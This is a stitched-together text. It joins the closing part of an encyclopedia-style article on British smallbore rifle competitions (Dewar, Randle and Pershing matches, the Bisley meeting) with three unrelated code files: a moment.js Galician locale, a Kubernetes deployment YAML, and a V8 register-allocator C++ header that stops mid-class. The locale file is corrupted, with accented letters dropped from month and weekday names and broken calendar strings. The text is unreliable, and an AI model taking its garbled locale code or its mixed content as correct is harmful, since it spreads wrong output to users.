expense of international travel. Contested initially by Great Britain and the United States, Australia won in 1972 and South Africa in 1998. Teams of 20 are selected and fire 20 shots at each of 50metres and 100yards on a home range, with scores compared by post. The British team typically hold trials and shoot at Appleton Rifle Club in Cheshire. The US team typically shoot at the US National Matches at Camp Perry (or more recently Camp Atterbury). Randle Match Similar to the Dewar Match, the Randle is an annual international postal for ladies teams of 10. First contested in 1952, it has been won by the United States or Great Britain every year except 1997 when South Africa won. In a Pershing or Roberts Match year, a shoulder-to-shoulder "Goodwill Randle" match is also held between the hosts and visitors. Pershing Trophy International Team Match The Pershing Trophy was presented to the National Rifle Association of America by General John J. Pershing in 1931 for use in a shoulder-to-shoulder international smallbore rifle competition. The 1931 match was won by Great Britain. The match was initially held at uneven intervals, determined by attendance of a visiting team. In 1969 it was agreed to set the interval at eight years, interspersed with a return match by the US to Bisley, resulting in a team travelling once every four years. When in Britain, teams compete for the Earl Roberts Trophy, with the event known as the Roberts Match. America has won 11 of the 13 Pershing matches (Britain won the first two) and 5 of the 7 Roberts Matches. The 13th match was held in 2022 at Camp Atterbury, Indiana. The match was postponed from 2021 due to travel restrictions. Bisley Rifle Meeting The first meeting was held in 1922 and has been held annually with the exception of the war years and 2020-21 when it was cancelled due to COVID-19. The meeting is normally held at the National Shooting Centre for a week starting on the third Saturday before August Bank Holiday Monday. Most competitions are shot on about 200 firing points sited on the 200-yard firing point of Century Range. Shooting is predominantly at 50metres and 100yards, with the exception of the Queen Alexandra Cup which includes a 25yard component. Three-Position events and the Double English match are fired at the Lord Roberts Centre on electronic targets broadly under ISSF Rules. The entry for the meeting is about 900 competitors. In 2022, the NSRA celebrated the "Bisley 100" Centenary edition of the meeting. The opening shot was performed by Michael More-Molyneux DL, Lord Lieutenant of Surrey on behalf of the Queen, patron of the Association. A number of additional "1922" events were added to the programme, including rapid-fire and timed shoots, derived from original 1922 targets (with scoring rings shrunk to account for improved modern rifles and ammunition). The "Earl Roberts" British Prone Championship was won by Lina Jones following a tie-shoot, the second time she has won the title. Programme Weekend Aggregate - 60 shots each at 50metres and 100yards, shot over the first weekend Grand Aggregate - 100 shots each at 50metres and 100yards, shot Monday-Thursday British Prone Rifle Championship (the "Earl Roberts") First stage on Friday, top half or third from each squad progress to second stage (depending on whether there are two or three squads) Second stage on the second Saturday morning, top 20 progress to Final Final on the second Saturday afternoon Home Countries International Match - Teams of 10 from each of the Home Nations (including Isle of Man & Channel Islands) British Men's 3x40 and Women's 3x20 Championships - Fired on electronic targets Double English Match - fired on electronic targets. Finals of the Astor Club Team Championship (club teams of 6), the Queen Alexandra Cup (county teams of 6 and individual) and the NSRA/Eley Competitions in Prone and 3P rifle (individual), the initial stages of which are run as postal competitions. During the "First Weekend" volunteers run the "SMRC Meeting" – a two-day event for Historic Arms in timelined designs (Classic = pre-1919, Veteran = 1919-1945, Open Historic = pre-1946 and some "Extended period" courses for basic rifles up to about 1960 design. Courses of fire for Prone, Offhand (Standing unsupported) a "new" Standing Supported course based on 19th-century practices: Classes of rifle include Target, Sporting, Military Training and – unusually for the NSRA – allow "pistol-calibre" rifles. "Earl Roberts" British Prone Championship . See also British Shooting Smallbore rifle shooting National Rifle Association (United Kingdom) References External links British Shooting Sports Council Sports governing bodies in the United Kingdom Rifle associations Shooting sports in the United Kingdom Shooting sports organizations Sports organizations established in 1901 1901 establishments in the United Kingdom
```javascript //! moment.js locale configuration //! locale : galician (gl) //! author : Juan G. Hurtado : path_to_url import moment from '../moment'; export default moment.defineLocale('gl', { months : 'Xaneiro_Febreiro_Marzo_Abril_Maio_Xuo_Xullo_Agosto_Setembro_Outubro_Novembro_Decembro'.split('_'), monthsShort : 'Xan._Feb._Mar._Abr._Mai._Xu._Xul._Ago._Set._Out._Nov._Dec.'.split('_'), monthsParseExact: true, weekdays : 'Domingo_Luns_Martes_Mrcores_Xoves_Venres_Sbado'.split('_'), weekdaysShort : 'Dom._Lun._Mar._Mr._Xov._Ven._Sb.'.split('_'), weekdaysMin : 'Do_Lu_Ma_M_Xo_Ve_S'.split('_'), weekdaysParseExact : true, longDateFormat : { LT : 'H:mm', LTS : 'H:mm:ss', L : 'DD/MM/YYYY', LL : 'D MMMM YYYY', LLL : 'D MMMM YYYY H:mm', LLLL : 'dddd D MMMM YYYY H:mm' }, calendar : { sameDay : function () { return '[hoxe ' + ((this.hours() !== 1) ? 's' : '') + '] LT'; }, nextDay : function () { return '[ma ' + ((this.hours() !== 1) ? 's' : '') + '] LT'; }, nextWeek : function () { return 'dddd [' + ((this.hours() !== 1) ? 's' : 'a') + '] LT'; }, lastDay : function () { return '[onte ' + ((this.hours() !== 1) ? '' : 'a') + '] LT'; }, lastWeek : function () { return '[o] dddd [pasado ' + ((this.hours() !== 1) ? 's' : 'a') + '] LT'; }, sameElse : 'L' }, relativeTime : { future : function (str) { if (str === 'uns segundos') { return 'nuns segundos'; } return 'en ' + str; }, past : 'hai %s', s : 'uns segundos', m : 'un minuto', mm : '%d minutos', h : 'unha hora', hh : '%d horas', d : 'un da', dd : '%d das', M : 'un mes', MM : '%d meses', y : 'un ano', yy : '%d anos' }, ordinalParse : /\d{1,2}/, ordinal : '%d', week : { dow : 1, // Monday is the first day of the week. doy : 7 // The week that contains Jan 1st is the first week of the year. } }); ```
```yaml apiVersion: extensions/v1beta1 kind: Deployment metadata: labels: app: test-app name: test-app spec: replicas: 1 selector: matchLabels: app: test-app template: metadata: labels: app: test-app spec: containers: - image: gcr.io/cbd-test/test-app:latest name: test-app --- apiVersion: v1 kind: Service metadata: labels: app: test-app name: test-app spec: ports: - port: 80 protocol: TCP targetPort: 8080 selector: app: test-app type: LoadBalancer ```
```objective-c // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef V8_REGISTER_ALLOCATOR_H_ #define V8_REGISTER_ALLOCATOR_H_ #include "src/base/compiler-specific.h" #include "src/compiler/instruction.h" #include "src/globals.h" #include "src/ostreams.h" #include "src/register-configuration.h" #include "src/zone/zone-containers.h" namespace v8 { namespace internal { namespace compiler { enum RegisterKind { GENERAL_REGISTERS, FP_REGISTERS }; // This class represents a single point of a InstructionOperand's lifetime. For // each instruction there are four lifetime positions: // // [[START, END], [START, END]] // // Where the first half position corresponds to // // [GapPosition::START, GapPosition::END] // // and the second half position corresponds to // // [Lifetime::USED_AT_START, Lifetime::USED_AT_END] // class LifetimePosition final { public: // Return the lifetime position that corresponds to the beginning of // the gap with the given index. static LifetimePosition GapFromInstructionIndex(int index) { return LifetimePosition(index * kStep); } // Return the lifetime position that corresponds to the beginning of // the instruction with the given index. static LifetimePosition InstructionFromInstructionIndex(int index) { return LifetimePosition(index * kStep + kHalfStep); } static bool ExistsGapPositionBetween(LifetimePosition pos1, LifetimePosition pos2) { if (pos1 > pos2) std::swap(pos1, pos2); LifetimePosition next(pos1.value_ + 1); if (next.IsGapPosition()) return next < pos2; return next.NextFullStart() < pos2; } // Returns a numeric representation of this lifetime position. int value() const { return value_; } // Returns the index of the instruction to which this lifetime position // corresponds. int ToInstructionIndex() const { DCHECK(IsValid()); return value_ / kStep; } // Returns true if this lifetime position corresponds to a START value bool IsStart() const { return (value_ & (kHalfStep - 1)) == 0; } // Returns true if this lifetime position corresponds to an END value bool IsEnd() const { return (value_ & (kHalfStep - 1)) == 1; } // Returns true if this lifetime position corresponds to a gap START value bool IsFullStart() const { return (value_ & (kStep - 1)) == 0; } bool IsGapPosition() const { return (value_ & 0x2) == 0; } bool IsInstructionPosition() const { return !IsGapPosition(); } // Returns the lifetime position for the current START. LifetimePosition Start() const { DCHECK(IsValid()); return LifetimePosition(value_ & ~(kHalfStep - 1)); } // Returns the lifetime position for the current gap START. LifetimePosition FullStart() const { DCHECK(IsValid()); return LifetimePosition(value_ & ~(kStep - 1)); } // Returns the lifetime position for the current END. LifetimePosition End() const { DCHECK(IsValid()); return LifetimePosition(Start().value_ + kHalfStep / 2); } // Returns the lifetime position for the beginning of the next START. LifetimePosition NextStart() const { DCHECK(IsValid()); return LifetimePosition(Start().value_ + kHalfStep); } // Returns the lifetime position for the beginning of the next gap START. LifetimePosition NextFullStart() const { DCHECK(IsValid()); return LifetimePosition(FullStart().value_ + kStep); } // Returns the lifetime position for the beginning of the previous START. LifetimePosition PrevStart() const { DCHECK(IsValid()); DCHECK(value_ >= kHalfStep); return LifetimePosition(Start().value_ - kHalfStep); } // Constructs the lifetime position which does not correspond to any // instruction. LifetimePosition() : value_(-1) {} // Returns true if this lifetime positions corrensponds to some // instruction. bool IsValid() const { return value_ != -1; } bool operator<(const LifetimePosition& that) const { return this->value_ < that.value_; } bool operator<=(const LifetimePosition& that) const { return this->value_ <= that.value_; } bool operator==(const LifetimePosition& that) const { return this->value_ == that.value_; } bool operator!=(const LifetimePosition& that) const { return this->value_ != that.value_; } bool operator>(const LifetimePosition& that) const { return this->value_ > that.value_; } bool operator>=(const LifetimePosition& that) const { return this->value_ >= that.value_; } void Print() const; static inline LifetimePosition Invalid() { return LifetimePosition(); } static inline LifetimePosition MaxPosition() { // We have to use this kind of getter instead of static member due to // crash bug in GDB. return LifetimePosition(kMaxInt); } static inline LifetimePosition FromInt(int value) { return LifetimePosition(value); } private: static const int kHalfStep = 2; static const int kStep = 2 * kHalfStep; // Code relies on kStep and kHalfStep being a power of two. STATIC_ASSERT(IS_POWER_OF_TWO(kHalfStep)); explicit LifetimePosition(int value) : value_(value) {} int value_; }; std::ostream& operator<<(std::ostream& os, const LifetimePosition pos); // Representation of the non-empty interval [start,end[. class UseInterval final : public ZoneObject { public: UseInterval(LifetimePosition start, LifetimePosition end) : start_(start), end_(end), next_(nullptr) { DCHECK(start < end); } LifetimePosition start() const { return start_; } void set_start(LifetimePosition start) { start_ = start; } LifetimePosition end() const { return end_; } void set_end(LifetimePosition end) { end_ = end; } UseInterval* next() const { return next_; } void set_next(UseInterval* next) { next_ = next; } // Split this interval at the given position without effecting the // live range that owns it. The interval must contain the position. UseInterval* SplitAt(LifetimePosition pos, Zone* zone); // If this interval intersects with other return smallest position // that belongs to both of them. LifetimePosition Intersect(const UseInterval* other) const { if (other->start() < start_) return other->Intersect(this); if (other->start() < end_) return other->start(); return LifetimePosition::Invalid(); } bool Contains(LifetimePosition point) const { return start_ <= point && point < end_; } // Returns the index of the first gap covered by this interval. int FirstGapIndex() const { int ret = start_.ToInstructionIndex(); if (start_.IsInstructionPosition()) { ++ret; } return ret; } // Returns the index of the last gap covered by this interval. int LastGapIndex() const { int ret = end_.ToInstructionIndex(); if (end_.IsGapPosition() && end_.IsStart()) { --ret; } return ret; } private: LifetimePosition start_; LifetimePosition end_; UseInterval* next_; DISALLOW_COPY_AND_ASSIGN(UseInterval); }; enum class UsePositionType : uint8_t { kAny, kRequiresRegister, kRequiresSlot }; enum class UsePositionHintType : uint8_t { kNone, kOperand, kUsePos, kPhi, kUnresolved }; static const int32_t kUnassignedRegister = RegisterConfiguration::kMaxGeneralRegisters; static_assert(kUnassignedRegister <= RegisterConfiguration::kMaxFPRegisters, "kUnassignedRegister too small"); // Representation of a use position. class V8_EXPORT_PRIVATE UsePosition final : public NON_EXPORTED_BASE(ZoneObject) { public: UsePosition(LifetimePosition pos, InstructionOperand* operand, void* hint, UsePositionHintType hint_type); InstructionOperand* operand() const { return operand_; } bool HasOperand() const { return operand_ != nullptr; } bool RegisterIsBeneficial() const { return RegisterBeneficialField::decode(flags_); } UsePositionType type() const { return TypeField::decode(flags_); } void set_type(UsePositionType type, bool register_beneficial); LifetimePosition pos() const { return pos_; } UsePosition* next() const { return next_; } void set_next(UsePosition* next) { next_ = next; } // For hinting only. void set_assigned_register(int register_code) { flags_ = AssignedRegisterField::update(flags_, register_code); } UsePositionHintType hint_type() const { return HintTypeField::decode(flags_); } bool HasHint() const; bool HintRegister(int* register_code) const; void SetHint(UsePosition* use_pos); void ResolveHint(UsePosition* use_pos); bool IsResolved() const { return hint_type() != UsePositionHintType::kUnresolved; } static UsePositionHintType HintTypeForOperand(const InstructionOperand& op); private: typedef BitField<UsePositionType, 0, 2> TypeField; typedef BitField<UsePositionHintType, 2, 3> HintTypeField; typedef BitField<bool, 5, 1> RegisterBeneficialField; typedef BitField<int32_t, 6, 6> AssignedRegisterField; InstructionOperand* const operand_; void* hint_; UsePosition* next_; LifetimePosition const pos_; uint32_t flags_; DISALLOW_COPY_AND_ASSIGN(UsePosition); }; class SpillRange; class RegisterAllocationData; class TopLevelLiveRange; class LiveRangeGroup; // Representation of SSA values' live ranges as a collection of (continuous) // intervals over the instruction ordering. class V8_EXPORT_PRIVATE LiveRange : public NON_EXPORTED_BASE(ZoneObject) { public: UseInterval* first_interval() const { return first_interval_; } UsePosition* first_pos() const { return first_pos_; } TopLevelLiveRange* TopLevel() { return top_level_; } const TopLevelLiveRange* TopLevel() const { return top_level_; } bool IsTopLevel() const; LiveRange* next() const { return next_; } int relative_id() const { return relative_id_; } bool IsEmpty() const { return first_interval() == nullptr; } InstructionOperand GetAssignedOperand() const; MachineRepresentation representation() const { return RepresentationField::decode(bits_); } int assigned_register() const { return AssignedRegisterField::decode(bits_); } bool HasRegisterAssigned() const { return assigned_register() != kUnassignedRegister; } void set_assigned_register(int reg); void UnsetAssignedRegister(); bool spilled() const { return SpilledField::decode(bits_); } void Spill(); RegisterKind kind() const; // Returns use position in this live range that follows both start // and last processed use position. UsePosition* NextUsePosition(LifetimePosition start) const; // Returns use position for which register is required in this live // range and which follows both start and last processed use position UsePosition* NextRegisterPosition(LifetimePosition start) const; // Returns the first use position requiring stack slot, or nullptr. UsePosition* NextSlotPosition(LifetimePosition start) const; // Returns use position for which register is beneficial in this live // range and which follows both start and last processed use position UsePosition* NextUsePositionRegisterIsBeneficial( LifetimePosition start) const; // Returns lifetime position for which register is beneficial in this live // range and which follows both start and last processed use position. LifetimePosition NextLifetimePositionRegisterIsBeneficial( const LifetimePosition& start) const; // Returns use position for which register is beneficial in this live // range and which precedes start. UsePosition* PreviousUsePositionRegisterIsBeneficial( LifetimePosition start) const; // Can this live range be spilled at this position. bool CanBeSpilled(LifetimePosition pos) const; // Splitting primitive used by both splitting and splintering members. // Performs the split, but does not link the resulting ranges. // The given position must follow the start of the range. // All uses following the given position will be moved from this // live range to the result live range. // The current range will terminate at position, while result will start from // position. enum HintConnectionOption : bool { DoNotConnectHints = false, ConnectHints = true }; UsePosition* DetachAt(LifetimePosition position, LiveRange* result, Zone* zone, HintConnectionOption connect_hints); // Detaches at position, and then links the resulting ranges. Returns the // child, which starts at position. LiveRange* SplitAt(LifetimePosition position, Zone* zone); // Returns nullptr when no register is hinted, otherwise sets register_index. UsePosition* FirstHintPosition(int* register_index) const; UsePosition* FirstHintPosition() const { int register_index; return FirstHintPosition(&register_index); } UsePosition* current_hint_position() const { DCHECK(current_hint_position_ == FirstHintPosition()); return current_hint_position_; } LifetimePosition Start() const { DCHECK(!IsEmpty()); return first_interval()->start(); } LifetimePosition End() const { DCHECK(!IsEmpty()); return last_interval_->end(); } bool ShouldBeAllocatedBefore(const LiveRange* other) const; bool CanCover(LifetimePosition position) const; bool Covers(LifetimePosition position) const; LifetimePosition FirstIntersection(LiveRange* other) const; void VerifyChildStructure() const { VerifyIntervals(); VerifyPositions(); } void ConvertUsesToOperand(const InstructionOperand& op, const InstructionOperand& spill_op); void SetUseHints(int register_index); void UnsetUseHints() { SetUseHints(kUnassignedRegister); } void Print(const RegisterConfiguration* config, bool with_children) const; void Print(bool with_children) const; private: friend class TopLevelLiveRange; explicit LiveRange(int relative_id, MachineRepresentation rep, TopLevelLiveRange* top_level); void UpdateParentForAllChildren(TopLevelLiveRange* new_top_level); void set_spilled(bool value) { bits_ = SpilledField::update(bits_, value); } UseInterval* FirstSearchIntervalForPosition(LifetimePosition position) const; void AdvanceLastProcessedMarker(UseInterval* to_start_of, LifetimePosition but_not_past) const; void VerifyPositions() const; void VerifyIntervals() const; typedef BitField<bool, 0, 1> SpilledField; typedef BitField<int32_t, 6, 6> AssignedRegisterField; typedef BitField<MachineRepresentation, 12, 8> RepresentationField; // Unique among children and splinters of the same virtual register. int relative_id_; uint32_t bits_; UseInterval* last_interval_; UseInterval* first_interval_; UsePosition* first_pos_; TopLevelLiveRange* top_level_; LiveRange* next_; // This is used as a cache, it doesn't affect correctness. mutable UseInterval* current_interval_; // This is used as a cache, it doesn't affect correctness. mutable UsePosition* last_processed_use_; // This is used as a cache, it's invalid outside of BuildLiveRanges. mutable UsePosition* current_hint_position_; // Cache the last position splintering stopped at. mutable UsePosition* splitting_pointer_; DISALLOW_COPY_AND_ASSIGN(LiveRange); }; class LiveRangeGroup final : public ZoneObject { public: explicit LiveRangeGroup(Zone* zone) : ranges_(zone) {} ZoneVector<LiveRange*>& ranges() { return ranges_; } const ZoneVector<LiveRange*>& ranges() const { return ranges_; } int assigned_register() const { return assigned_register_; } void set_assigned_register(int reg) { assigned_register_ = reg; } private: ZoneVector<LiveRange*> ranges_; int assigned_register_; DISALLOW_COPY_AND_ASSIGN(LiveRangeGroup); }; class V8_EXPORT_PRIVATE TopLevelLiveRange final : public LiveRange { public: explicit TopLevelLiveRange(int vreg, MachineRepresentation rep); int spill_start_index() const { return spill_start_index_; } bool IsFixed() const { return vreg_ < 0; } bool is_phi() const { return IsPhiField::decode(bits_); } void set_is_phi(bool value) { bits_ = IsPhiField::update(bits_, value); } bool is_non_loop_phi() const { return IsNonLoopPhiField::decode(bits_); } void set_is_non_loop_phi(bool value) { bits_ = IsNonLoopPhiField::update(bits_, value); } bool has_slot_use() const { return HasSlotUseField::decode(bits_); } void set_has_slot_use(bool value) { bits_ = HasSlotUseField::update(bits_, value); } // Add a new interval or a new use position to this live range. void EnsureInterval(LifetimePosition start, LifetimePosition end, Zone* zone); void AddUseInterval(LifetimePosition start, LifetimePosition end, Zone* zone); void AddUsePosition(UsePosition* pos); // Shorten the most recently added interval by setting a new start. void ShortenTo(LifetimePosition start); // Detaches between start and end, and attributes the resulting range to // result. // The current range is pointed to as "splintered_from". No parent/child // relationship is established between this and result. void Splinter(LifetimePosition start, LifetimePosition end, Zone* zone); // Assuming other was splintered from this range, embeds other and its // children as part of the children sequence of this range. void Merge(TopLevelLiveRange* other, Zone* zone); // Spill range management. void SetSpillRange(SpillRange* spill_range); enum class SpillType { kNoSpillType, kSpillOperand, kSpillRange }; void set_spill_type(SpillType value) { bits_ = SpillTypeField::update(bits_, value); } SpillType spill_type() const { return SpillTypeField::decode(bits_); } InstructionOperand* GetSpillOperand() const { DCHECK(spill_type() == SpillType::kSpillOperand); return spill_operand_; } SpillRange* GetAllocatedSpillRange() const { DCHECK(spill_type() != SpillType::kSpillOperand); return spill_range_; } SpillRange* GetSpillRange() const { DCHECK(spill_type() == SpillType::kSpillRange); return spill_range_; } bool HasNoSpillType() const { return spill_type() == SpillType::kNoSpillType; } bool HasSpillOperand() const { return spill_type() == SpillType::kSpillOperand; } bool HasSpillRange() const { return spill_type() == SpillType::kSpillRange; } AllocatedOperand GetSpillRangeOperand() const; void RecordSpillLocation(Zone* zone, int gap_index, InstructionOperand* operand); void SetSpillOperand(InstructionOperand* operand); void SetSpillStartIndex(int start) { spill_start_index_ = Min(start, spill_start_index_); } void CommitSpillMoves(InstructionSequence* sequence, const InstructionOperand& operand, bool might_be_duplicated); // If all the children of this range are spilled in deferred blocks, and if // for any non-spilled child with a use position requiring a slot, that range // is contained in a deferred block, mark the range as // IsSpilledOnlyInDeferredBlocks, so that we avoid spilling at definition, // and instead let the LiveRangeConnector perform the spills within the // deferred blocks. If so, we insert here spills for non-spilled ranges // with slot use positions. void TreatAsSpilledInDeferredBlock(Zone* zone, int total_block_count) { spill_start_index_ = -1; spilled_in_deferred_blocks_ = true; spill_move_insertion_locations_ = nullptr; list_of_blocks_requiring_spill_operands_ = new (zone) BitVector(total_block_count, zone); } void CommitSpillInDeferredBlocks(RegisterAllocationData* data, const InstructionOperand& spill_operand, BitVector* necessary_spill_points); TopLevelLiveRange* splintered_from() const { return splintered_from_; } bool IsSplinter() const { return splintered_from_ != nullptr; } bool MayRequireSpillRange() const { DCHECK(!IsSplinter()); return !HasSpillOperand() && spill_range_ == nullptr; } void UpdateSpillRangePostMerge(TopLevelLiveRange* merged); int vreg() const { return vreg_; } #if DEBUG int debug_virt_reg() const; #endif void Verify() const; void VerifyChildrenInOrder() const; int GetNextChildId() { return IsSplinter() ? splintered_from()->GetNextChildId() : ++last_child_id_; } int GetChildCount() const { return last_child_id_ + 1; } bool IsSpilledOnlyInDeferredBlocks() const { return spilled_in_deferred_blocks_; } struct SpillMoveInsertionList; SpillMoveInsertionList* GetSpillMoveInsertionLocations() const { DCHECK(!IsSpilledOnlyInDeferredBlocks()); return spill_move_insertion_locations_; } TopLevelLiveRange* splinter() const { return splinter_; } void SetSplinter(TopLevelLiveRange* splinter) { DCHECK_NULL(splinter_); DCHECK_NOT_NULL(splinter); splinter_ = splinter; splinter->relative_id_ = GetNextChildId(); splinter->set_spill_type(spill_type()); splinter->SetSplinteredFrom(this); } void MarkHasPreassignedSlot() { has_preassigned_slot_ = true; } bool has_preassigned_slot() const { return has_preassigned_slot_; } void AddBlockRequiringSpillOperand(RpoNumber block_id) { DCHECK(IsSpilledOnlyInDeferredBlocks()); GetListOfBlocksRequiringSpillOperands()->Add(block_id.ToInt()); } BitVector* GetListOfBlocksRequiringSpillOperands() const { DCHECK(IsSpilledOnlyInDeferredBlocks()); return list_of_blocks_requiring_spill_operands_; } private: void SetSplinteredFrom(TopLevelLiveRange* splinter_parent); typedef BitField<bool, 1, 1> HasSlotUseField; typedef BitField<bool, 2, 1> IsPhiField; typedef BitField<bool, 3, 1> IsNonLoopPhiField; typedef BitField<SpillType, 4, 2> SpillTypeField; int vreg_; int last_child_id_; TopLevelLiveRange* splintered_from_; union { // Correct value determined by spill_type() InstructionOperand* spill_operand_; SpillRange* spill_range_; }; union { SpillMoveInsertionList* spill_move_insertion_locations_; BitVector* list_of_blocks_requiring_spill_operands_; }; // TODO(mtrofin): generalize spilling after definition, currently specialized // just for spill in a single deferred block. bool spilled_in_deferred_blocks_; int spill_start_index_; UsePosition* last_pos_; TopLevelLiveRange* splinter_; bool has_preassigned_slot_; DISALLOW_COPY_AND_ASSIGN(TopLevelLiveRange); }; struct PrintableLiveRange { const RegisterConfiguration* register_configuration_; const LiveRange* range_; }; std::ostream& operator<<(std::ostream& os, const PrintableLiveRange& printable_range); class SpillRange final : public ZoneObject { public: static const int kUnassignedSlot = -1; SpillRange(TopLevelLiveRange* range, Zone* zone); UseInterval* interval() const { return use_interval_; } bool IsEmpty() const { return live_ranges_.empty(); } bool TryMerge(SpillRange* other); bool HasSlot() const { return assigned_slot_ != kUnassignedSlot; } void set_assigned_slot(int index) { DCHECK_EQ(kUnassignedSlot, assigned_slot_); assigned_slot_ = index; } int assigned_slot() { DCHECK_NE(kUnassignedSlot, assigned_slot_); return assigned_slot_; } const ZoneVector<TopLevelLiveRange*>& live_ranges() const { return live_ranges_; } ZoneVector<TopLevelLiveRange*>& live_ranges() { return live_ranges_; } // Spill slots can be 4, 8, or 16 bytes wide. int byte_width() const { return byte_width_; } void Print() const; private: LifetimePosition End() const { return end_position_; } bool IsIntersectingWith(SpillRange* other) const; // Merge intervals, making sure the use intervals are sorted void MergeDisjointIntervals(UseInterval* other); ZoneVector<TopLevelLiveRange*> live_ranges_; UseInterval* use_interval_; LifetimePosition end_position_; int assigned_slot_; int byte_width_; DISALLOW_COPY_AND_ASSIGN(SpillRange); }; class RegisterAllocationData final : public ZoneObject { public: class PhiMapValue : public ZoneObject { public: PhiMapValue(PhiInstruction* phi, const InstructionBlock* block, Zone* zone); const PhiInstruction* phi() const { return phi_; } const InstructionBlock* block() const { return block_; } // For hinting. int assigned_register() const { return assigned_register_; } void set_assigned_register(int register_code) { DCHECK_EQ(assigned_register_, kUnassignedRegister); assigned_register_ = register_code; } void UnsetAssignedRegister() { assigned_register_ = kUnassignedRegister; } void AddOperand(InstructionOperand* operand); void CommitAssignment(const InstructionOperand& operand); private: PhiInstruction* const phi_; const InstructionBlock* const block_; ZoneVector<InstructionOperand*> incoming_operands_; int assigned_register_; }; typedef ZoneMap<int, PhiMapValue*> PhiMap; struct DelayedReference { ReferenceMap* map; InstructionOperand* operand; }; typedef ZoneVector<DelayedReference> DelayedReferences; typedef ZoneVector<std::pair<TopLevelLiveRange*, int>> RangesWithPreassignedSlots; RegisterAllocationData(const RegisterConfiguration* config, Zone* allocation_zone, Frame* frame, InstructionSequence* code, const char* debug_name = nullptr); const ZoneVector<TopLevelLiveRange*>& live_ranges() const { return live_ranges_; } ZoneVector<TopLevelLiveRange*>& live_ranges() { return live_ranges_; } const ZoneVector<TopLevelLiveRange*>& fixed_live_ranges() const { return fixed_live_ranges_; } ZoneVector<TopLevelLiveRange*>& fixed_live_ranges() { return fixed_live_ranges_; } ZoneVector<TopLevelLiveRange*>& fixed_float_live_ranges() { return fixed_float_live_ranges_; } const ZoneVector<TopLevelLiveRange*>& fixed_float_live_ranges() const { return fixed_float_live_ranges_; } ZoneVector<TopLevelLiveRange*>& fixed_double_live_ranges() { return fixed_double_live_ranges_; } const ZoneVector<TopLevelLiveRange*>& fixed_double_live_ranges() const { return fixed_double_live_ranges_; } ZoneVector<TopLevelLiveRange*>& fixed_simd128_live_ranges() { return fixed_simd128_live_ranges_; } const ZoneVector<TopLevelLiveRange*>& fixed_simd128_live_ranges() const { return fixed_simd128_live_ranges_; } ZoneVector<BitVector*>& live_in_sets() { return live_in_sets_; } ZoneVector<BitVector*>& live_out_sets() { return live_out_sets_; } ZoneVector<SpillRange*>& spill_ranges() { return spill_ranges_; } DelayedReferences& delayed_references() { return delayed_references_; } InstructionSequence* code() const { return code_; } // This zone is for data structures only needed during register allocation // phases. Zone* allocation_zone() const { return allocation_zone_; } // This zone is for InstructionOperands and moves that live beyond register // allocation. Zone* code_zone() const { return code()->zone(); } Frame* frame() const { return frame_; } const char* debug_name() const { return debug_name_; } const RegisterConfiguration* config() const { return config_; } MachineRepresentation RepresentationFor(int virtual_register); TopLevelLiveRange* GetOrCreateLiveRangeFor(int index); // Creates a new live range. TopLevelLiveRange* NewLiveRange(int index, MachineRepresentation rep); TopLevelLiveRange* NextLiveRange(MachineRepresentation rep); SpillRange* AssignSpillRangeToLiveRange(TopLevelLiveRange* range); SpillRange* CreateSpillRangeForLiveRange(TopLevelLiveRange* range); MoveOperands* AddGapMove(int index, Instruction::GapPosition position, const InstructionOperand& from, const InstructionOperand& to); bool IsReference(TopLevelLiveRange* top_range) const { return code()->IsReference(top_range->vreg()); } bool ExistsUseWithoutDefinition(); bool RangesDefinedInDeferredStayInDeferred(); void MarkAllocated(MachineRepresentation rep, int index); PhiMapValue* InitializePhiMap(const InstructionBlock* block, PhiInstruction* phi); PhiMapValue* GetPhiMapValueFor(TopLevelLiveRange* top_range); PhiMapValue* GetPhiMapValueFor(int virtual_register); bool IsBlockBoundary(LifetimePosition pos) const; RangesWithPreassignedSlots& preassigned_slot_ranges() { return preassigned_slot_ranges_; } private: int GetNextLiveRangeId(); Zone* const allocation_zone_; Frame* const frame_; InstructionSequence* const code_; const char* const debug_name_; const RegisterConfiguration* const config_; PhiMap phi_map_; ZoneVector<BitVector*> live_in_sets_; ZoneVector<BitVector*> live_out_sets_; ZoneVector<TopLevelLiveRange*> live_ranges_; ZoneVector<TopLevelLiveRange*> fixed_live_ranges_; ZoneVector<TopLevelLiveRange*> fixed_float_live_ranges_; ZoneVector<TopLevelLiveRange*> fixed_double_live_ranges_; ZoneVector<TopLevelLiveRange*> fixed_simd128_live_ranges_; ZoneVector<SpillRange*> spill_ranges_; DelayedReferences delayed_references_; BitVector* assigned_registers_; BitVector* assigned_double_registers_; int virtual_register_count_; RangesWithPreassignedSlots preassigned_slot_ranges_; DISALLOW_COPY_AND_ASSIGN(RegisterAllocationData); }; class ConstraintBuilder final : public ZoneObject { public: explicit ConstraintBuilder(RegisterAllocationData* data); // Phase 1 : insert moves to account for fixed register operands. void MeetRegisterConstraints(); // Phase 2: deconstruct SSA by inserting moves in successors and the headers // of blocks containing phis. void ResolvePhis(); private: RegisterAllocationData* data() const { return data_; } InstructionSequence* code() const { return data()->code(); } Zone* allocation_zone() const { return data()->allocation_zone(); } InstructionOperand* AllocateFixed(UnallocatedOperand* operand, int pos, bool is_tagged); void MeetRegisterConstraints(const InstructionBlock* block); void MeetConstraintsBefore(int index); void MeetConstraintsAfter(int index); void MeetRegisterConstraintsForLastInstructionInBlock( const InstructionBlock* block); void ResolvePhis(const InstructionBlock* block); RegisterAllocationData* const data_; DISALLOW_COPY_AND_ASSIGN(ConstraintBuilder); }; class LiveRangeBuilder final : public ZoneObject { public: explicit LiveRangeBuilder(RegisterAllocationData* data, Zone* local_zone); // Phase 3: compute liveness of all virtual register. void BuildLiveRanges(); static BitVector* ComputeLiveOut(const InstructionBlock* block, RegisterAllocationData* data); private: RegisterAllocationData* data() const { return data_; } InstructionSequence* code() const { return data()->code(); } Zone* allocation_zone() const { return data()->allocation_zone(); } Zone* code_zone() const { return code()->zone(); } const RegisterConfiguration* config() const { return data()->config(); } ZoneVector<BitVector*>& live_in_sets() const { return data()->live_in_sets(); } // Verification. void Verify() const; bool IntervalStartsAtBlockBoundary(const UseInterval* interval) const; bool IntervalPredecessorsCoveredByRange(const UseInterval* interval, const TopLevelLiveRange* range) const; bool NextIntervalStartsInDifferentBlocks(const UseInterval* interval) const; // Liveness analysis support. void AddInitialIntervals(const InstructionBlock* block, BitVector* live_out); void ProcessInstructions(const InstructionBlock* block, BitVector* live); void ProcessPhis(const InstructionBlock* block, BitVector* live); void ProcessLoopHeader(const InstructionBlock* block, BitVector* live); static int FixedLiveRangeID(int index) { return -index - 1; } int FixedFPLiveRangeID(int index, MachineRepresentation rep); 